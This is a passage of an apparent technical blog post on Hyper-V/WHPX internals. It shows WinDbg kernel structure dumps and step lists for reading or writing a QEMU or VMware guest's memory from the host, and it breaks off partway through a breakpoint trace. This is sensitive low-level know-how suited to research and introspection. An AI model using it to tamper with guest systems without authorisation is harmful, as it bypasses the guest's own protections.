<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a75a8 00000000`0007fff0 – Start virtual page address</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a75b0 00000000`0008008f – End virtual page address</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a75b8 ffffad04`c7872c28</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a75c0 ffffad04`c7872c28</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a75c8 00000000`00000001</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a75d0 53646156`02050000</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a75d8 00000000`00000000</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a75e0 00000000`00000000</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a75e8 00000000`00000000</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="77" src="https://lh6.googleusercontent.com/nW-HHF9oBqpJ8mNVYoaX8nTHbthuMbXYLRGKuXKRU-301ECR8HQDJvJw9owxfRmDmquKSjNyUmFc0JtlNQrh6BN6QwLhTrQYR-7LGqIvangs6Zh0_uEe-ppUvOEhxrTKP2qIMa3061fvoPuFCQ" style="margin-left: 0px; margin-top: 0px;" width="490" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In some ways, the EXO partition memory organization resembles the VAD tree, which describes the state of a process address space and is built on AVL trees. It likewise stores the minimum and maximum values of each memory block's range.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="margin-left: -5.4pt; text-align: left;">
<table style="border-collapse: collapse; border: none; text-align: left;"><colgroup><col width="208"></col><col width="208"></col><col width="208"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dt ntkrnlmp!_MMVAD_SHORT</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 NextVad : Ptr64 _MMVAD_SHORT</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 ExtraCreateInfo : Ptr64 Void</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 VadNode : _RTL_BALANCED_NODE</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x018 StartingVpn : Uint4B</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x01c EndingVpn : Uint4B</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x020 StartingVpnHigh : UChar</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x021 EndingVpnHigh : UChar</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x022 CommitChargeHigh : UChar</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x023 SpareNT64VadUChar : UChar</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x024 ReferenceCount : Int4B</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x028 PushLock : _EX_PUSH_LOCK</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x030 u : <anonymous-tag></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x034 u1 : <anonymous-tag></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x038 EventList : Ptr64 _MI_VAD_EVENT_BLOCK</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dt ntkrnlmp!_MMVAD</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Core : _MMVAD_SHORT</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x040 u2 : <anonymous-tag></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x048 Subsection : Ptr64 _SUBSECTION</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x050 FirstPrototypePte : Ptr64 _MMPTE</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x058 LastContiguousPte : Ptr64 _MMPTE</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x060 ViewLinks : _LIST_ENTRY</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x070 VadsProcess : Ptr64 _EPROCESS</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x078 u4 : <anonymous-tag></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x080 FileObject : Ptr64 _FILE_OBJECT</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dt ntkrnlmp!_MI_VAD_SEQUENTIAL_INFO</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Length : Pos 0, 12 Bits</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Vpn : Pos 12, 52 Bits</span></div>
</td></tr>
</tbody></table>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Finally, to read/write the virtual address space of a guest OS running in Qemu with whpx acceleration, you must first:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1. translate the virtual address into a physical one using vid.dll!VidTranslateGvatoGpa and obtain the physical address.</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2. find the required GPN-list entry or tree node by comparing its start and end GPA with the physical address obtained in step 1.</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3. get the VPN-list and find the memory block offset in the address space of the qemu-system-x86_64.exe or vmware-vmx.exe process.</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4. read or write the corresponding memory block (depending on the operation).</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Option 2 (Theoretical. Does not require kernel-mode operations, but hasn’t been tested):</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1. Get the physical address from the virtual one using winhvplatform.dll!WHvTranslateGva</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2. Scan the address space of the qemu-system-x86_64.exe or vmware-vmx.exe process and find a block that matches the size of the guest RAM (hoping it is one contiguous block without fragmentation)</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3. Treat the physical address as an offset into that process memory block</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4. Read or write, and hope that you're lucky)</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Yes, this variant is not 100% reliable, but it doesn’t require kernel-mode parsing of the EXO trees.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can get a trace while Qemu starts:</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">qemu-system-x86_64.exe -m 3072M -smp 1 -drive file=Win1020H1.qcow2,index=0,media=disk,cache=writeback -accel whpx</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">with the WinDBG command</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bp winhvr!WinHvMapGpaPagesSpecial "r rcx,rdx,r8,r9;g"</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0: kd> g</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=0000000000000000 r8=0000000000080400 r9=00000000000c0000</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000fffc0 r8=0000000000080400 r9=0000000000000040</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=0000000000000000 r8=0000000000080400 r9=00000000000000c0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000c0 r8=0000000000080400 r9=0000000000000020</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000e0 r8=0000000000080400 r9=0000000000000020</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=0000000000000100 r8=0000000000080400 r9=00000000000bff00</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=0000000000000000 r8=0000000000080400 r9=00000000000000a0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000c0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000d0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000e0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000f0 r8=0000000000080400 r9=00000000000bff10</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000c0 r8=0000000000080400 r9=00000000000bff40</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000fd000 r8=0000000000080400 r9=0000000000001000</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000febe0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000feb80 r8=0000000000080400 r9=0000000000000040</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000c0 r8=0000000000080400 r9=000000000000000b</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000cb r8=0000000000080400 r9=0000000000000003</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000ce r8=0000000000080400 r9=0000000000000002</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000d0 r8=0000000000080400 r9=0000000000000020</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000f0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=0000000000000100 r8=0000000000080400 r9=00000000000bff00</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000ce r8=0000000000080400 r9=000000000000001a</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000e8 r8=0000000000080400 r9=0000000000000008</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
